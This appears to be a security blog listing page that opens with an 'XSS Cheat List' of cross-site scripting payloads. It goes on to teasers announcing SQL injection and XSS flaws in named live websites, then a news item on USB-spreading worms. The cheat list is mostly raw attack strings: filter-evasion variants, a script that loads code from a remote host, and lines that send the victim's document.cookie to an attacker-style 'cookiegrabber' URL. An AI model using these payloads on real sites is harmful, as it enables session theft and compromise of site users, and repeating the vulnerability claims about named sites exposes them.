XSS Cheat List
<script>alert(1);</script> <script>alert(‘XSS’);</script> <script src=”http://www.evilsite.org/cookiegrabber.php”></script> <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script> <scr<script>ipt>alert(‘XSS’);</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port’\ja\vasc\ript:alert(“XSS”)’;</style> <? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?> <marquee><script>alert(‘XSS’)</script></marquee> <IMG SRC=”jav	ascript:alert(‘XSS’);”> <IMG SRC=”jav
ascript:alert(‘XSS’);”> <IMG SRC=”jav
ascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> “><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <font style=’color:expression(alert(document.cookie))’> ‘); alert(‘XSS <img src=”javascript:alert(‘XSS’)”> <script language=”JavaScript”>alert(‘XSS’)</script> [url=javascript:alert('XSS');]click me[/url] <body onunload=”javascript:alert(‘XSS’);”> <body onLoad=”alert(‘XSS’);” [color=red' onmouseover="alert('xss')"]mouse over[/color] “/></a></><img src=1.gif onerror=alert(1)> window.alert(“Bonjour [...]
Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal
Security Researcher $@T0R! reported another Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user [...]
Critical SQL Injection in singforyou.net
Security Researcher $@T0R! has reported another Critical SQL Injection in singforyou.net. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is [...]
25 per cent of new worms designed to spread via USB
48 per cent of SMBs are infected by worms each year according to a report published by security vendor PandaLabs. The Second International SMB Security Barometer report (PDF here) surveyed 10,470 companies across Europe, Latin America and North America and found that a third of attacks came from malware capable of spreading via USB. According [...]
Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/
PlanetCreator has reported another Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/. Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers [...]